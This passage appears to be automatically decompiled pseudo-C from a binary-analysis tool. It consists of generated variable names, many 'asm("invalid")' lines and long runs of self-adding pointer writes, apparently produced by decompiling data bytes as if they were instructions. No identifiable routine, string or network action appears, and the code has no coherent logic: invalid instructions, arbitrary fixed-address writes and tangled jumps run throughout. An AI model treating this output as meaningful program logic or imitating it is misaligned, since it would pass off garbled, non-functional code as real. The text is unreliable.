                    				_t504 = _t497 &  *_t497;
                    				 *_t504 =  *_t504 + _t504;
                    				 *_t504 =  *_t504 + _t504;
                    				 *_t504 =  *_t504 + _t504;
                    				 *_t504 =  *_t504 + _t504;
                    				 *_t504 =  *_t504 + _t504;
                    				 *_t504 =  *_t504 + _t504;
                    				_t506 = (_t504 ^ 0x00000017) + 1;
                    				 *_t717 =  *_t717 + _t506;
                    				 *_t691 =  *_t691 + _t506;
                    				 *_t506 =  *_t506 + _t717;
                    				_t507 = _t506 & 0x00000040;
                    				 *_t507 =  *_t507 + _t507;
                    				asm("invalid");
                    				asm("invalid");
                    				asm("invalid");
                    				asm("invalid");
                    				 *_t507 =  *_t507 + _t507;
                    				 *_t507 =  *_t507 + _t507;
                    				asm("in al, dx");
                    				_t508 = _t507 & 0x91380040;
                    				_t719 = _t717 + 1;
                    				 *_t508 =  *_t508 + _t508;
                    				 *_t508 =  *_t508 + _t508;
                    				 *((intOrPtr*)(_t508 + 0x247d)) =  *((intOrPtr*)(_t508 + 0x247d)) + _t691;
                    				 *_t508 =  *_t508 + _t508;
                    				 *_t508 =  *_t508 + _t508;
                    				 *_t508 =  *_t508 + _t508;
                    				 *_t508 =  *_t508 + _t508;
                    				 *_t508 =  *_t508 + _t508;
                    				 *((intOrPtr*)(_t750 + 0x40 + _t741)) =  *((intOrPtr*)(_t750 + 0x40 + _t741)) + _t719;
                    				 *_t719 =  *_t719 + _t508;
                    				 *_t758 =  *_t758 + _t508;
                    				 *_t508 =  *_t508 + _t719;
                    				_t509 = _t508 & 0x00000040;
                    				 *_t509 =  *_t509 + _t509;
                    				asm("invalid");
                    				asm("invalid");
                    				asm("invalid");
                    				asm("invalid");
                    				 *_t509 =  *_t509 + _t509;
                    				 *_t509 =  *_t509 + _t509;
                    				if( *_t509 >= 0) {
                    					_t675 = _t509 + 1;
                    					 *((intOrPtr*)(_t675 - 0x6f)) =  *((intOrPtr*)(_t675 - 0x6f)) + _t719;
                    					_t719 = _t719 + 1;
                    					 *_t675 =  *_t675 + _t675;
                    					 *_t675 =  *_t675 + _t675;
                    					 *((intOrPtr*)(_t675 + 0x7d)) =  *((intOrPtr*)(_t675 + 0x7d)) + _t691;
                    					_t676 = _t675 & 0x00000000;
                    					 *_t676 =  *_t676 + _t676;
                    					 *_t676 =  *_t676 + _t676;
                    					 *_t676 =  *_t676 + _t676;
                    					 *_t676 =  *_t676 + _t676;
                    					 *_t676 =  *_t676 + _t676;
                    					 *_t676 =  *_t676 + _t676;
                    					asm("movsb");
                    					_pop(ss);
                    					_t509 = _t676 + 1;
                    					 *_t719 =  *_t719 + _t509;
                    					 *0x40250800 =  *0x40250800 + _t719;
                    					 *_t509 =  *_t509 + _t509;
                    				}
                    				 *_t509 =  *_t509 + _t509;
                    				 *_t509 =  *_t509 + _t509;
                    				asm("invalid");
                    				asm("invalid");
                    				asm("invalid");
                    				asm("invalid");
                    				 *_t509 =  *_t509 + _t509;
                    				 *_t509 =  *_t509 + _t509;
                    				asm("int3");
                    				asm("daa");
                    				_t512 = _t719;
                    				_t721 = _t509 + 1 + _t691 + 1;
                    				 *_t512 =  *_t512 + _t512;
                    				 *_t512 =  *_t512 + _t512;
                    				 *_t512 =  *_t512 + _t721;
                    				if( *_t512 <= 0) {
                    					 *_t512 =  *_t512 + _t512;
                    					 *_t512 =  *_t512 + _t512;
                    					 *_t512 =  *_t512 + _t512;
                    					 *_t512 =  *_t512 + _t512;
                    					 *_t512 =  *_t512 + _t512;
                    					 *_t512 =  *_t512 + _t512;
                    					_pop(ss);
                    					_t512 = _t512 + _t691 + 1;
                    					 *_t721 =  *_t721 + _t512;
                    					 *((intOrPtr*)(_t512 + _t512)) =  *((intOrPtr*)(_t512 + _t512)) + _t721;
                    					 *0x40 =  *0x40 | _t512;
                    					 *_t512 =  *_t512 + _t512;
                    					asm("invalid");
                    					asm("invalid");
                    					asm("invalid");
                    					asm("invalid");
                    				}
                    				 *_t512 =  *_t512 + 1;
                    				 *_t512 =  *_t512 + _t512;
                    				 *((intOrPtr*)(_t750 - 0x6e37ffc0)) =  *((intOrPtr*)(_t750 - 0x6e37ffc0)) + _t691;
                    				_t722 = _t721 + 1;
                    				 *_t512 =  *_t512 + _t512;
                    				 *_t512 =  *_t512 + _t512;
                    				 *((intOrPtr*)(_t512 + 0x7f)) =  *((intOrPtr*)(_t512 + 0x7f)) + _t722;
                    				_t513 = _t512 & 0x00000000;
                    				 *_t513 =  *_t513 + _t513;
                    				 *_t513 =  *_t513 + _t513;
                    				 *_t513 =  *_t513 + _t513;
                    				 *_t513 =  *_t513 + _t513;
                    				 *_t513 =  *_t513 + _t513;
                    				 *_t513 =  *_t513 + _t513;
                    				asm("adc al, 0x18");
                    				_t514 = _t513 + 1;
                    				 *_t722 =  *_t722 + _t514;
                    				 *_t691 =  *_t691 + _t722;
                    				 *_t514 =  *_t514 + _t722;
                    				_t515 = _t514 & 0x00000040;
                    				 *_t515 =  *_t515 + _t515;
                    				asm("invalid");
                    				asm("invalid");
                    				asm("invalid");
                    				asm("invalid");
                    				 *_t515 =  *_t515 + _t515;
                    				 *_t515 =  *_t515 + _t515;
                    				asm("insb");
                    				asm("daa");
                    				_t516 = _t515 + 1;
                    				 *((intOrPtr*)(_t516 + 0x4191)) =  *((intOrPtr*)(_t516 + 0x4191)) + _t691;
                    				 *_t516 =  *_t516 + _t516;
                    				_t517 = _t516 + _t691;
                    				if(_t517 < 0) {
                    					 *_t517 =  *_t517 + _t517;
                    					 *_t517 =  *_t517 + _t517;
                    					 *_t517 =  *_t517 + _t517;
                    					 *_t517 =  *_t517 + _t517;
                    					 *_t517 =  *_t517 + _t517;
                    					 *_t517 =  *_t517 + _t517;
                    					 *((intOrPtr*)(_t517 + _t691 + 0x40)) =  *((intOrPtr*)(_t517 + _t691 + 0x40)) + _t722;
                    					 *_t722 =  *_t722 + _t517;
                    					 *((intOrPtr*)(_t517 + _t517)) =  *((intOrPtr*)(_t517 + _t517)) + _t517;
                    					 *0x40 =  *0x40 | _t517;
                    					 *_t517 =  *_t517 + _t517;
                    					asm("invalid");
                    					asm("invalid");
                    					asm("invalid");
                    					asm("invalid");
                    				}
                    				 *_t517 =  *_t517 + 1;
                    				 *_t517 =  *_t517 + _t517;
                    				 *_t758 =  *_t758 + _t691;
                    				_t518 = _t517 + 1;
                    				 *((intOrPtr*)(_t518 - 0x6f)) =  *((intOrPtr*)(_t518 - 0x6f)) + _t722;
                    				_t723 = _t722 + 1;
                    				 *_t518 =  *_t518 + _t518;
                    				 *_t518 =  *_t518 + _t518;
                    				 *((intOrPtr*)(_t518 + 0x7c)) =  *((intOrPtr*)(_t518 + 0x7c)) + _t723;
                    				_t519 = _t518 & 0x00000000;
                    				 *_t519 =  *_t519 + _t519;
                    				 *_t519 =  *_t519 + _t519;
                    				 *_t519 =  *_t519 + _t519;
                    				 *_t519 =  *_t519 + _t519;
                    				 *_t519 =  *_t519 + _t519;
                    				 *_t519 =  *_t519 + _t519;
                    				_t520 = _t519 + 1;
                    				 *_t723 =  *_t723 + _t520;
                    				 *_t741 =  *_t741 + _t723;
                    				 *_t520 =  *_t520 + _t723;
                    				_t521 = _t520 & 0x00000040;
                    				 *_t521 =  *_t521 + _t521;
                    				asm("invalid");
                    				asm("invalid");
                    				asm("invalid");
                    				asm("invalid");
                    				 *_t521 =  *_t521 + _t521;
                    				 *_t521 =  *_t521 + _t521;
                    				_t522 = _t521 + 1;
                    				 *((intOrPtr*)(_t522 + 0x4191)) =  *((intOrPtr*)(_t522 + 0x4191)) + _t723;
                    				while(1) {
                    					 *_t522 =  *_t522 + _t522;
                    					 *_t522 =  *_t522 + _t522;
                    					_pop(_t523);
                    					if( *_t522 <= 0) {
                    						 *_t523 =  *_t523 + _t523;
                    						 *_t523 =  *_t523 + _t523;
                    						 *_t523 =  *_t523 + _t523;
                    						 *_t523 =  *_t523 + _t523;
                    						 *_t523 =  *_t523 + _t523;
                    						 *_t523 =  *_t523 + _t523;
                    						 *((intOrPtr*)(_t523 + _t691 + 0x10040)) =  *((intOrPtr*)(_t523 + _t691 + 0x10040)) + _t691;
                    						_t523 = _t523 +  *_t523;
                    						 *0x40 =  *0x40 | _t523;
                    						 *_t523 =  *_t523 + _t523;
                    						asm("invalid");
                    						asm("invalid");
                    						asm("invalid");
                    						asm("invalid");
                    					}
                    					 *_t523 =  *_t523 + 1;
                    					 *_t523 =  *_t523 + _t523;
                    					 *((intOrPtr*)(_t759 - 0x6fd7ffc0)) =  *((intOrPtr*)(_t759 - 0x6fd7ffc0)) + _t691;
                    					_t724 = _t723 + 1;
                    					 *_t523 =  *_t523 + _t523;
                    					 *_t523 =  *_t523 + _t523;
                    					_t524 = _t523 + _t691;
                    					if(_t524 < 0) {
                    						break;
                    					}
                    					 *_t524 =  *_t524 + _t524;
                    					 *_t524 =  *_t524 + _t524;
                    					 *_t524 =  *_t524 + _t524;
                    					 *_t524 =  *_t524 + _t524;
                    					 *_t524 =  *_t524 + _t524;
                    					 *_t524 =  *_t524 + _t524;
                    					_t522 = _t524 + _t741;
                    					asm("sbb [eax], al");
                    					_push(_t522);
                    					 *_t522 =  *_t522 + _t522;
                    					_t723 = _t724 + _t691;
                    					if(_t723 > 0) {
                    						continue;
                    					} else {
                    						asm("in al, dx");
                    						asm("sti");
                    						_t741 = 0x49;
                    						_t691 = _t691 - 1;
                    						_t767 = 0x17291d76;
                    						_t524 = _t522 - 0xce7a;
                    					}
                    					break;
                    				}
                    				asm("into");
                    				 *_t524 =  *_t524 + _t524;
                    				 *_t524 =  *_t524 + _t524;
                    				 *_t524 =  *_t524 + _t524;
                    				 *_t524 =  *_t524 + _t524;
                    				 *_t524 =  *_t524 + _t524;
                    				 *_t524 =  *_t524 + _t524;
                    				 *_t524 =  *_t524 + _t524;
                    				 *_t524 =  *_t524 + _t524;
                    				 *_t524 =  *_t524 + _t524;
                    				 *_t524 =  *_t524 + _t524;
                    				asm("adc [ebx], al");
                    				 *_t524 =  *_t524 + _t524;
                    				 *_t524 =  *_t524 + _t524;
                    				 *_t524 =  *_t524 + _t524;
                    				 *_t524 =  *_t524 + _t524;
                    				 *_t524 =  *_t524 + _t524;
                    				while(1) {
                    					 *_t524 =  *_t524 + _t524;
                    					 *_t524 =  *_t524 + _t524;
                    					 *_t524 =  *_t524 + _t524;
                    					 *_t524 =  *_t524 + _t524;
                    					 *_t524 =  *_t524 + _t524;
                    					 *_t524 =  *_t524 + _t524;
                    					 *((intOrPtr*)(_t691 + 1)) =  *((intOrPtr*)(_t691 + 1)) + _t724;
                    					 *_t524 =  *_t524 + _t524;
                    					_t524 = _t524 + _t691;
                    					asm("adc [eax], eax");
                    					_t767 = _t767 - 1;
                    					 *_t524 =  *_t524 + _t524;
                    					 *_t524 =  *_t524 + _t741;
                    					 *_t524 =  *_t524 + _t524;
                    					_t818 =  *_t524;
                    					if(_t818 > 0) {
                    						break;
                    					}
                    					if(_t818 > 0) {
                    						continue;
                    					} else {
                    						asm("in eax, 0xee");
                    						_t524 = _t524 - 0x83259b49;
                    						asm("a16 ja 0xffffffc4");
                    						asm("adc [eax], edx");
                    						 *_t524 =  *_t524 + _t524;
                    						 *0x12b = _t524;
                    						 *_t524 =  *_t524 + _t524;
                    						 *((intOrPtr*)( &(_t750[0x10]) + _t524)) =  *((intOrPtr*)( &(_t750[0x10]) + _t524)) + _t724;
                    						 *((intOrPtr*)(_t524 + _t524 + 0x42560000)) =  *((intOrPtr*)(_t524 + _t524 + 0x42560000)) + _t691;
                    					}
                    					break;
                    				}
                    				 *((intOrPtr*)(_t758 + 0x42)) =  *((intOrPtr*)(_t758 + 0x42)) + _t741;
                    				_t525 = _t524 ^ 0x2a263621;
                    				 *_t525 =  *_t525 + _t525;
                    				 *_t525 =  *_t525 + _t525;
                    				 *_t525 =  *_t525 + _t525;
                    				 *_t525 =  *_t525 + _t525;
                    				 *_t525 =  *_t525 + _t525;
                    				 *_t525 =  *_t525 + _t525;
                    				 *_t758 =  *_t758 + _t691;
                    				 *_t525 =  *_t525 + _t525;
                    				 *_t525 =  *_t525 + _t525;
                    				 *_t525 =  *_t525 + _t525;
                    				 *_t525 =  *_t525 + _t525;
                    				 *_t525 =  *_t525 + _t525;
                    				 *_t525 =  *_t525 + _t525;
                    				_t527 = (_t525 |  *_t525) + 4;
                    				 *_t527 =  *_t527 + _t527;
                    				 *_t527 =  *_t527 + _t527;
                    				 *_t527 =  *_t527 + _t527;
                    				 *_t527 =  *_t527 + _t527;
                    				 *_t527 =  *_t527 + _t527;
                    				if( *_t527 >= 0) {
                    					_t673 = _t527 + 1;
                    					 *_t673 =  *_t673 + _t691;
                    					asm("clc");
                    					 *_t673 =  *_t673 ^ _t673;
                    					_t691 = _t691 + _t691;
                    					asm("invalid");
                    					 *_t673 =  *_t673 | _t673;
                    					 *_t673 =  *_t673 + _t673;
                    					 *_t673 =  *_t673 + _t673;
                    					 *_t673 =  *_t673 + _t673;
                    					_t527 = _t673 +  *_t673;
                    					 *_t527 =  *_t527 + _t527;
                    				}
                    				asm("sbb [eax], al");
                    				_t528 = _t527 + 1;
                    				 *((intOrPtr*)(_t724 + _t741 + 0x780040)) =  *((intOrPtr*)(_t724 + _t741 + 0x780040)) + _t741;
                    				 *_t528 =  *_t528 + _t528;
                    				_t529 =  *_t528;
                    				 *_t529 = _t528;
                    				 *_t529 =  *_t529 + _t529;
                    				_t530 = _t759;
                    				_t760 = _t529;
                    				 *_t530 =  *_t530 + _t530;
                    				 *_t758 =  *_t758 + _t741;
                    				 *_t530 =  *_t530 + _t530;
                    				 *_t530 =  *_t530 + _t530;
                    				 *_t530 =  *_t530 + _t530;
                    				 *_t530 =  *_t530 + _t530;
                    				 *_t530 =  *_t530 + _t530;
                    				 *_t530 =  *_t530 + _t530;
                    				 *_t530 =  *_t530 + _t530;
                    				_t176 = _t758 + 0x6f;
                    				 *_t176 =  *((intOrPtr*)(_t758 + 0x6f)) + _t530;
                    				if( *_t176 < 0) {
                    					L56:
                    					 *_t530 =  *_t530 + _t530;
                    					 *((intOrPtr*)(_t741 + _t691 + 0x10040)) =  *((intOrPtr*)(_t741 + _t691 + 0x10040)) + _t741;
                    					 *_t530 =  *_t530 + _t530;
                    					goto L57;
                    				} else {
                    					_pop(_t751);
                    					_t530 = _t530 - 1;
                    					_t724 = _t724 + 1;
                    					_push(_t758);
                    					_t750 = _t751 + 1;
                    					_push(_t760);
                    					_t767 = _t767 - 1 + 1;
                    					_t741 = _t741 + 1;
                    					_t178 = _t758 + 0x6f;
                    					 *_t178 =  *((intOrPtr*)(_t758 + 0x6f)) + _t530;
                    					if( *_t178 < 0) {
                    						L58:
                    						 *_t530 =  *_t530 + _t530;
                    						 *_t530 =  *_t530 + _t530;
                    						 *((intOrPtr*)(_t530 + 0x100401a)) =  *((intOrPtr*)(_t530 + 0x100401a)) + _t691;
                    						 *_t530 =  *_t530 + _t530;
                    						 *((intOrPtr*)(_t741 + _t691 + 0x40)) =  *((intOrPtr*)(_t741 + _t691 + 0x40)) + _t691;
                    					} else {
                    						_pop(_t750);
                    						_t767 = _t767 + 1;
                    						_t760 =  *(_t691 + 0x6b) * 0x726f7265;
                    						 *[ss:eax] =  *[ss:eax] + _t530;
                    						_t758 = _t758 + 1;
                    						asm("outsd");
                    						if(_t758 >= 0) {
                    							_pop(_t750);
                    							_t760 =  *(_t691 + 0x6b) * 0x726f7265;
                    							 *[ss:eax] =  *[ss:eax] + _t530;
                    							 *_t530 =  *_t530 + _t530;
                    							 *_t530 =  *_t530 + _t530;
                    							 *_t530 =  *_t530 + _t530;
                    							 *0x40 =  *0x40 | _t530;
                    							 *_t530 =  *_t530 + _t530;
                    							_pop(_t767);
                    							_t737 = _t724 + 1;
                    							_t691 = _t691 + _t691;
                    							asm("invalid");
                    							 *_t530 =  *_t530 + 1;
                    							 *_t530 =  *_t530 + _t530;
                    							 *((intOrPtr*)(_t760 - 0x6febffc0)) =  *((intOrPtr*)(_t760 - 0x6febffc0)) + _t737;
                    							_t724 = _t737 + 1;
                    							 *_t530 =  *_t530 + _t530;
                    							 *_t530 =  *_t530 + _t530;
                    							 *_t530 =  *_t530 + _t691;
                    							if( *_t530 >= 0) {
                    								 *_t530 =  *_t530 + _t530;
                    								 *_t530 =  *_t530 + _t530;
                    								 *_t530 =  *_t530 + _t530;
                    								 *_t530 =  *_t530 + _t530;
                    								 *_t530 =  *_t530 + _t530;
                    								 *_t530 =  *_t530 + _t530;
                    								 *((intOrPtr*)(_t741 + _t691 + 0x10040)) =  *((intOrPtr*)(_t741 + _t691 + 0x10040)) + _t741;
                    								 *_t530 =  *_t530 + _t530;
                    								 *_t750 =  *_t750 ^ _t741;
                    								_t530 = _t530 + 1;
                    								 *_t530 =  *_t530 + _t530;
                    								goto L56;
                    							}
                    							L57:
                    							 *((intOrPtr*)(_t741 + _t691 + 0x40)) =  *((intOrPtr*)(_t741 + _t691 + 0x40)) + _t691;
                    							goto L58;
                    						}
                    					}
                    				}
                    				 *_t530 =  *_t530 + _t530;
                    				_t750[0x1b001a00] = _t750[0x1b001a00] + _t741;
                    				_t531 = _t530 + _t530;
                    				asm("sbb al, [eax]");
                    				asm("in al, 0x9d");
                    				_t725 = _t724 + 1;
                    				 *_t531 =  *_t531 + _t531;
                    				 *_t531 =  *_t531 + _t531;
                    				 *((intOrPtr*)(_t531 + 0x1e)) =  *((intOrPtr*)(_t531 + 0x1e)) + _t691;
                    				asm("daa");
                    				 *((intOrPtr*)(_t531 + 0x37)) =  *((intOrPtr*)(_t531 + 0x37)) + _t531;
                    				_t532 = _t531 + 1;
                    				 *((intOrPtr*)(_t532 + 0x37)) =  *((intOrPtr*)(_t532 + 0x37)) + _t741;
                    				_t533 = _t532 + 1;
                    				 *_t533 =  *_t533 + _t533;
                    				_pop(ds);
                    				 *((intOrPtr*)(_t533 + _t533)) =  *((intOrPtr*)(_t533 + _t533)) + _t741;
                    				 *_t533 =  *_t533 + _t533;
                    				asm("insb");
                    				asm("das");
                    				_t534 = _t533 + 1;
                    				_t692 = _t691 + _t691;
                    				asm("invalid");
                    				 *_t534 =  *_t534 + 1;
                    				 *_t534 =  *_t534 + _t534;
                    				 *_t534 =  *_t534 + _t534;
                    				 *_t534 =  *_t534 + _t534;
                    				_t535 = _t534 + _t534;
                    				asm("sbb al, [eax]");
                    				asm("lock pop ebx");
                    				 *_t535 =  *_t535 & _t535;
                    				if( *_t535 >= 0) {
                    					_t671 = _t535 + 1;
                    					_t692 = _t692 + _t692;
                    					asm("invalid");
                    					 *_t671 =  *_t671 + 1;
                    					 *_t671 =  *_t671 + _t671;
                    					 *((intOrPtr*)(_t741 + _t692 + 0x1a3c0040)) =  *((intOrPtr*)(_t741 + _t692 + 0x1a3c0040)) + _t692;
                    					_t672 = _t671 + 1;
                    					 *((intOrPtr*)(_t672 - 0x71ffbfef)) =  *((intOrPtr*)(_t672 - 0x71ffbfef)) + _t725;
                    					asm("adc [eax], eax");
                    					_t535 = _t767;
                    					_t767 = _t672;
                    					asm("adc [eax], eax");
                    					 *_t535 =  *_t535 + _t535;
                    					 *_t535 =  *_t535 + _t535;
                    					 *_t535 =  *_t535 + _t535;
                    					 *_t535 =  *_t535 + _t535;
                    					 *_t535 =  *_t535 + _t535;
                    					 *_t535 =  *_t535 + _t535;
                    					 *_t535 =  *_t535 + _t535;
                    					 *_t535 =  *_t535 + _t535;
                    					 *_t535 =  *_t535 + _t535;
                    				}
                    				 *_t535 =  *_t535 + _t535;
                    				_t536 = _t535 + _t741;
                    				 *_t536 =  *_t536 + _t536;
                    				 *_t536 =  *_t536 + _t725;
                    				_t537 = _t536 & 0x00000040;
                    				 *_t537 =  *_t537 + _t537;
                    				asm("pushad");
                    				 *_t725 =  *_t725 + 0x70;
                    				 *_t725 =  *_t725 + 0x34;
                    				asm("sbb al, 0x0");
                    				 *_t537 =  *_t537 + _t537;
                    				 *((intOrPtr*)(_t741 + 0x4011)) =  *((intOrPtr*)(_t741 + 0x4011)) + _t537;
                    				 *_t537 =  *_t537 + _t537;
                    				 *((intOrPtr*)(_t692 + _t741 + 0x60040)) =  *((intOrPtr*)(_t692 + _t741 + 0x60040)) + _t537;
                    				 *_t537 =  *_t537 + _t537;
                    				 *_t537 =  *_t537 + _t537;
                    				 *_t537 =  *_t537 + _t537;
                    				 *0x40 =  *0x40 | _t537;
                    				 *_t537 =  *_t537 + _t537;
                    				asm("pushfd");
                    				_t693 = _t692 + _t692;
                    				asm("invalid");
                    				 *_t537 =  *_t537 + 1;
                    				 *_t537 =  *_t537 + _t537;
                    				 *((intOrPtr*)(0x40 + _t760)) =  *((intOrPtr*)(0x40 + _t760)) + _t693;
                    				 *_t537 =  *_t537 + _t537;
                    				_t728 = _t725 + 3;
                    				 *_t750 =  *_t750 + _t741;
                    				 *_t537 =  *_t537 + _t537;
                    				 *((intOrPtr*)(_t537 + 0x6100401f)) =  *((intOrPtr*)(_t537 + 0x6100401f)) + _t741;
                    				 *_t537 =  *_t537 + _t537;
                    				 *((intOrPtr*)(_t693 + _t728 * 4)) =  *((intOrPtr*)(_t693 + _t728 * 4)) + _t537;
                    				 *[es:esi+ebx] =  *[es:esi+ebx] + _t728;
                    				_t538 = _t537 + 1;
                    				 *_t728 =  *_t728 + _t538;
                    				 *_t538 =  *_t538 + _t538;
                    				_t540 = _t538 + _t538 + 1;
                    				 *_t540 =  *_t540 + _t540;
                    				 *_t540 =  *_t540 + _t540;
                    				 *_t540 =  *_t540 + _t728;
                    				_t541 = _t540 + 1;
                    				 *_t728 =  *_t728 + _t541;
                    				 *_t541 =  *_t541 + _t541;
                    				 *_t541 =  *_t541 + _t741;
                    				_t542 = _t541 + 1;
                    				 *_t542 =  *_t542 + _t542;
                    				 *_t542 =  *_t542 + _t542;
                    				 *_t542 =  *_t542 + _t741;
                    				 *_t542 =  *_t542 & _t542;
                    				_pop(es);
                    				 *_t542 =  *_t542 + _t542;
                    				 *_t542 =  *_t542 + _t741;
                    				 *_t741 =  *_t741 + _t741;
                    				_t750[0x1b001a00] = _t750[0x1b001a00] + _t741;
                    				 *_t728 =  *_t728 + _t728;
                    				_t545 = _t542 + 2 + _t728;
                    				asm("movsb");
                    				 *_t545 =  *_t545 + _t545;
                    				 *_t545 =  *_t545 + _t545;
                    				 *((intOrPtr*)( &(_t750[0x42d8009]) + _t767)) =  *((intOrPtr*)( &(_t750[0x42d8009]) + _t767)) + _t741;
                    				asm("popfd");
                    				_t730 = _t728 + 2;
                    				 *((intOrPtr*)(_t741 + _t758)) =  *((intOrPtr*)(_t741 + _t758)) + _t741;
                    				_t548 = _t545 + 1 + _t741 + 1;
                    				 *((intOrPtr*)(_t741 + _t758)) =  *((intOrPtr*)(_t741 + _t758)) + _t548;
                    				_t549 = _t548 + 1;
                    				 *((intOrPtr*)(_t741 + _t758 + 0x40)) =  *((intOrPtr*)(_t741 + _t758 + 0x40)) + _t549;
                    				 *((intOrPtr*)(_t549 + 0x32)) =  *((intOrPtr*)(_t549 + 0x32)) + _t693;
                    				_t550 = _t549 + 1;
                    				 *((intOrPtr*)(_t550 + _t741 + 0x10c20040)) =  *((intOrPtr*)(_t550 + _t741 + 0x10c20040)) + _t693;
                    				_t551 = _t550 + 1;
                    				 *((intOrPtr*)(_t741 + _t758 + 0x40)) =  *((intOrPtr*)(_t741 + _t758 + 0x40)) + _t693;
                    				 *((intOrPtr*)(_t741 + _t758 + 0x10c80040)) =  *((intOrPtr*)(_t741 + _t758 + 0x10c80040)) + _t551;
                    				 *((intOrPtr*)(_t758 + _t760 + 0x32a80040)) =  *((intOrPtr*)(_t758 + _t760 + 0x32a80040)) + _t741;
                    				asm("adc [eax], al");
                    				asm("aam 0x10");
                    				_t554 = _t551 + 3;
                    				asm("adc [eax], al");
                    				asm("cld");
                    				 *_t554 =  *_t554 ^ _t554;
                    				asm("int3");
                    				asm("loopne 0x12");
                    				asm("loopne 0x34");
                    				_t559 = ((_t554 ^  *_t554) + 0x00000001 + _t693 ^  *((_t554 ^  *_t554) + 1 + _t693)) + 1;
                    				_t744 = _t730 + _t741 + _t693 + _t559;
                    				asm("adc [eax], al");
                    				asm("cld");
                    				asm("adc al, 0x33");
                    				_t561 = (_t559 ^  *_t559) + 1;
                    				 *((intOrPtr*)(_t693 + _t758 + 0x40)) =  *((intOrPtr*)(_t693 + _t758 + 0x40)) + _t730;
                    				 *((intOrPtr*)(_t561 + 0x33)) =  *((intOrPtr*)(_t561 + 0x33)) + _t730;
                    				_t562 = _t561 + 1;
                    				 *_t562 = _t730 +  *_t562;
                    				asm("in al, dx");
                    				asm("adc [eax], al");
                    				asm("repne adc [eax], al");
                    				asm("clc");
                    				asm("adc [eax], al");
                    				asm("invalid");
                    				_t564 = (_t562 ^  *_t562) + 1;
                    				 *((intOrPtr*)(_t730 + _t744)) =  *((intOrPtr*)(_t730 + _t744)) + _t564;
                    				_t565 = _t564 + 1;
                    				 *((intOrPtr*)(_t565 - 0x53ffbfcd)) =  *((intOrPtr*)(_t565 - 0x53ffbfcd)) + _t730;
                    				asm("enter 0x4033, 0x0");
                    				_t569 = (_t565 ^  *_t565) + 0x00000001 + _t730 ^  *((_t565 ^  *_t565) + 1 + _t730);
                    				asm("lock xor eax, [eax]");
                    				 *((intOrPtr*)(((_t565 ^  *_t565) + 0x00000001 + _t730 ^  *((_t565 ^  *_t565) + 1 + _t730)) + _t569 * 2)) =  *((intOrPtr*)(((_t565 ^  *_t565) + 0x00000001 + _t730 ^  *((_t565 ^  *_t565) + 1 + _t730)) + ((_t565 ^  *_t565) + 0x00000001 + _t730 ^  *((_t565 ^  *_t565) + 1 + _t730)) * 2)) + _t744;
                    				 *((intOrPtr*)(_t767 + _t758)) =  *((intOrPtr*)(_t767 + _t758)) + _t744;
                    				 *_t744 =  *_t744 + _t730;
                    				asm("adc [eax], eax");
                    				_pop(_t571);
                    				_t572 = _t571 ^ 0x00000040;
                    				 *_t572 =  *_t572 + _t744;
                    				asm("adc [eax], eax");
                    				_push(ss);
                    				asm("adc [eax], eax");
                    				asm("sbb al, 0x11");
                    				_t573 = _t572 + 1;
                    				 *((intOrPtr*)(_t573 + 0x34)) =  *((intOrPtr*)(_t573 + 0x34)) + _t573;
                    				_t574 = _t573 + 1;
                    				 *_t574 =  *_t574 + _t744;
                    				_t745 = _t744 &  *_t730;
                    				_t576 = (_t574 ^  *_t574) + 1;
                    				 *_t576 =  *_t576 + _t730;
                    				asm("adc [eax], eax");
                    				if( *_t576 >= 0) {
                    					 *_t758 =  *_t758 + _t730;
                    					asm("adc [eax], eax");
                    					 *((intOrPtr*)(_t730 + _t745)) =  *((intOrPtr*)(_t730 + _t745)) + _t745;
                    					_t668 = (_t576 + 0x00000001 ^ 0x00000040) + 1;
                    					 *((intOrPtr*)(_t668 + 0x3a004034)) =  *((intOrPtr*)(_t668 + 0x3a004034)) + _t693;
                    					asm("adc [eax], eax");
                    					asm("adc [eax], eax");
                    					asm("pushfd");
                    					_t670 = _t668 + 0x00000001 ^ 0x00000040;
                    					 *((intOrPtr*)(_t670 + 0x46004034)) =  *((intOrPtr*)(_t670 + 0x46004034)) + _t745;
                    					asm("adc [eax], eax");
                    					 *(_t670 + 0x1db40041) =  *(_t670 + 0x1db40041) | _t745;
                    					_t576 = _t670 + 1;
                    					 *((intOrPtr*)(_t767 + _t758 + 0x35400040)) =  *((intOrPtr*)(_t767 + _t758 + 0x35400040)) + _t745;
                    				}
                    				_t577 = _t576 + 1;
                    				 *((intOrPtr*)(_t758 + 0x35000040)) =  *((intOrPtr*)(_t758 + 0x35000040)) + _t577;
                    				_t580 = _t577 + 0x00000001 + _t730 ^ 0x00000040;
                    				 *((intOrPtr*)(_t730 + 0x40 + _t745)) =  *((intOrPtr*)(_t730 + 0x40 + _t745)) + _t730;
                    				 *((intOrPtr*)(_t580 + 0x35)) =  *((intOrPtr*)(_t580 + 0x35)) + _t580;
                    				 *((intOrPtr*)(_t745 + 0x11)) =  *((intOrPtr*)(_t745 + 0x11)) + _t745;
                    				_t582 = _t580 + 2;
                    				 *((intOrPtr*)(_t582 + 0x35)) =  *((intOrPtr*)(_t582 + 0x35)) + _t693;
                    				_t583 = _t582 + 1;
                    				 *((intOrPtr*)(_t583 + 0x11)) =  *((intOrPtr*)(_t583 + 0x11)) + _t693;
                    				_t584 = _t583 + 1;
                    				 *((intOrPtr*)(_t584 - 0x3bffbfcb)) =  *((intOrPtr*)(_t584 - 0x3bffbfcb)) + _t745;
                    				 *_t584 =  *_t584 ^ _t584;
                    				asm("movsb");
                    				_t586 = (_t584 ^ 0x35d00040) + 1;
                    				 *_t586 =  *_t586 + _t745;
                    				 *_t586 =  *_t586 ^ _t586;
                    				asm("in al, 0x35");
                    				_t587 = _t586 + 1;
                    				 *((intOrPtr*)(_t587 - 0x7ffbfcf)) =  *((intOrPtr*)(_t587 - 0x7ffbfcf)) + _t730;
                    				_t589 = (_t587 ^ 0x115e0040) + 1;
                    				 *((intOrPtr*)(_t730 + 0x40 + _t745)) =  *((intOrPtr*)(_t730 + 0x40 + _t745)) + _t589;
                    				_t591 = _t589 + _t589 + 1;
                    				 *_t591 =  *_t591 + _t730;
                    				 *((intOrPtr*)(_t758 + _t758)) =  *((intOrPtr*)(_t758 + _t758)) + _t693;
                    				_t593 = _t591 + 2;
                    				 *_t593 =  *_t593 + _t693;
                    				 *((intOrPtr*)(_t758 + _t758 + 0x40)) =  *((intOrPtr*)(_t758 + _t758 + 0x40)) + _t693;
                    				 *((intOrPtr*)(_t745 + 0x11)) =  *((intOrPtr*)(_t745 + 0x11)) + _t730;
                    				_t595 = _t593 + 2;
